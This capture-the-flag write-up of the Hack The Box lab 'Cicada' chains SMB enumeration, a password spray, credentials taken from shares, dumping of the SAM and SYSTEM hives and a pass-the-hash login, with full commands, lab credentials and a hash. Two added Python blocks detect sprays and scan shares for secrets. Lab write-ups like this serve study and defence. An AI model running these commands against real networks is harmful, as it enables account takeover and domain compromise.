HTB Cicada lab notes

Target: Cicada, IP address: 10.10.11.35

1. Information gathering

1. Scan the target's ports with nmap and print the service details for each open port

nmap -sVC 10.10.11.35

nmap -sVC 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 22:30 EDT
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 90.91% done; ETC: 22:31 (0:00:04 remaining)
Nmap scan report for localhost (10.10.11.35)
Host is up (0.14s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-27 09:12:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-03-27T09:12:52
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h41m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.50 seconds

Open ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269

2. Run the nmap vuln scripts against the open ports

nmap --script=vuln -p53,88,135,139,389,445,464,593,636,3268,3269 -oN vuln 10.10.11.35

Nmap scan report for 10.10.11.35
Host is up (0.35s latency).

PORT      STATE    SERVICE

53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open     wsman
54435/tcp filtered unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

2. SMB enumeration

1. First try anonymous access to the SMB service on port 445

smbclient -L 10.10.11.35

Logging in with an empty password and listing the shares shows an HR share in addition to the standard ones.

Connect to the HR share and download the HR file locally (the file name contains spaces, so it must be quoted):

get "Notice from HR.txt"


Reading the file gives us a password:

Cicada$M6Corpb*@Lp#nZp!8

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards, Cicada Corp

We do not know any usernames, so we enumerate the machine's users with crackmapexec (RID brute force over the guest session):

crackmapexec smb 10.10.11.35 -u 'dsad' -p '' --rid-brute


Collect the usernames into a txt wordlist:

Administrator
Guest
krbtgt
Domain
Protected
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

2. Test the password against every user in the list

crackmapexec smb 10.10.11.35 -u user -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success


This yields one working username:password pair:

michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
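From the defender's side, the step above is a single-password spray across the enumerated user list, which leaves a distinctive trace in the domain controller's Security log: many different target accounts failing from one source in a short window, followed by one success. The detection logic below is an added example, not part of the original post; the 4625/4624 event rows, the source IPs and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed rows shaped like Windows Security events 4625 (failed logon) and
# 4624 (successful logon): (timestamp, event id, target user, source IP).
# Invented for this demo; the source IPs are not from the box.
SAMPLE_EVENTS = [
    ("2025-03-27 09:20:01", 4625, "john.smoulder",     "10.10.14.5"),
    ("2025-03-27 09:20:02", 4625, "sarah.dantelia",    "10.10.14.5"),
    ("2025-03-27 09:20:02", 4624, "michael.wrightson", "10.10.14.5"),
    ("2025-03-27 09:20:03", 4625, "david.orelious",    "10.10.14.5"),
    ("2025-03-27 09:20:03", 4625, "emily.oscars",      "10.10.14.5"),
    ("2025-03-27 09:35:10", 4625, "john.smoulder",     "10.10.14.9"),
    ("2025-03-27 09:36:40", 4625, "john.smoulder",     "10.10.14.9"),
]

def detect_spray(events, window=timedelta(seconds=60), min_users=4):
    """Return {source_ip: (failed_user_count, [users_that_succeeded])} for every
    source whose failed logons hit at least `min_users` distinct accounts within
    `window`. Repeated failures against one account (10.10.14.9 here) are a
    brute-force pattern, not a spray, and are left to a separate rule."""
    by_source = defaultdict(list)
    for ts, event_id, user, src in events:
        stamp = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        by_source[src].append((stamp, event_id, user.lower()))
    alerts = {}
    for src, rows in by_source.items():
        rows.sort()
        for i, (start, _, _) in enumerate(rows):
            failed, succeeded = set(), set()
            for stamp, event_id, user in rows[i:]:
                if stamp - start > window:
                    break
                (failed if event_id == 4625 else succeeded).add(user)
            if len(failed) >= min_users:
                alerts[src] = (len(failed), sorted(succeeded))
                break
    return alerts

if __name__ == "__main__":
    for src, (n, hits) in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {src}: {n} accounts, success for {hits}")
```

The success reported alongside the spray is the account whose default password was never changed, which is exactly the control (force a change at first logon) that the HR notice relies on users to apply themselves.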

Trying to log in to WinRM with this account fails.


Use this username/password combination to enumerate the other accounts:

crackmapexec smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

This reveals another account's password: david.orelious:aRt$Lp#7t*VQ!3

Logging in as this user and checking the share permissions shows an additional DEV share with read access.

Download the contents of the share:

smbclient '\\10.10.11.35\DEV' -U david.orelious

View the file inside it:

cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

This gives another username:password pair: emily.oscars:Q!3@Lp#M6b*7t*Vt
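Both credential leaks on this box (a default password in a plaintext notice on the HR share, and a credential hard-coded with ConvertTo-SecureString -AsPlainText in Backup_script.ps1 on the DEV share) are what a periodic share sweep should catch before an attacker does. The scanner below is an added example, not from the original post: it runs a few secret patterns over file contents, reports hits with the secret redacted, and includes a credential-free variant of the backup script step. The patterns, file names and the Import-Clixml alternative are assumptions of this example.

```python
import re

# Patterns for secrets left in share files. Constructed for this demo; tune them
# before sweeping a real file server (false positives are cheap, misses are not).
SECRET_PATTERNS = [
    ("PowerShell plaintext SecureString",
     re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)),
    ("password variable literal",
     re.compile(r'\$(?:password|passwd|pwd)\s*=\s*"([^"]+)"', re.I)),
    ("password stated in prose",
     re.compile(r'\bpassword\s+is:\s*(\S+)', re.I)),
]

# Inputs under test, copied from the two files found on the HR and DEV shares.
HR_NOTICE = "Your default password is: Cicada$M6Corpb*@Lp#nZp!8\n"
BACKUP_SCRIPT = (
    '$username = "emily.oscars"\n'
    '$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force\n'
    '$credentials = New-Object System.Management.Automation.PSCredential($username, $password)\n'
)
# The same script step with no literal secret: the PSCredential object is read
# from a DPAPI-protected file created once via Get-Credential | Export-Clixml.
SAFE_SCRIPT = '$credentials = Import-Clixml -Path "D:\\Backup\\backup-cred.xml"\n'

def redact(secret):
    """Keep only a two-character prefix so a report can be filed without re-leaking it."""
    return secret[:2] + "*" * (len(secret) - 2)

def scan_text(name, text):
    """Return [(file, line_no, label, redacted_secret)] for each hit in `text`."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        for label, pat in SECRET_PATTERNS:
            m = pat.search(line)
            if m:
                hits.append((name, no, label, redact(m.group(1))))
    return hits

def scan_share(files):
    """files: {filename: content}. Returns all hits across the share, sorted by file."""
    return [h for name, text in sorted(files.items()) for h in scan_text(name, text)]

if __name__ == "__main__":
    for hit in scan_share({"Notice from HR.txt": HR_NOTICE,
                           "Backup_script.ps1": BACKUP_SCRIPT,
                           "clean.ps1": SAFE_SCRIPT}):
        print(hit)
```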

3. Getting a foothold and escalating privileges

1. Try these credentials to log in to the Windows host; the login succeeds.

evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

user.txt is on the Desktop; read it for the first flag:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> cat user.txt
9b66b089812c9065a0631208e1cbdd6d

2. Privilege escalation

We currently have an ordinary user's privileges; how do we reach administrator?

First check the current account's privileges:

whoami /priv

The output shows that this user holds backup privileges, so the SAM and SYSTEM hives can be saved out, the administrator's NTLM hash extracted from them, and a pass-the-hash (PTH) attack used to obtain administrator privileges. Reference: HTB-Cicada 靶机笔记 - LingX5 - 博客园.

Create a temp directory under C: and save the hives into it:

reg save hklm\sam c:\temp\sam

reg save hklm\system c:\temp\system

With sam and system saved in the temp directory, download both files to the local machine.

Dump the hashes from the SAM:

impacket-secretsdump -sam sam -system system LOCAL

This gives the administrator's NTLM hash: 2b87e7c93a3e8a0ea4a581937016f341

Log in with the hash and read root.txt:

evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341

For background on PTH attacks, see: PTH(Pass The Hash)哈希传递攻击手法与防范-腾讯云开发者社区-腾讯云
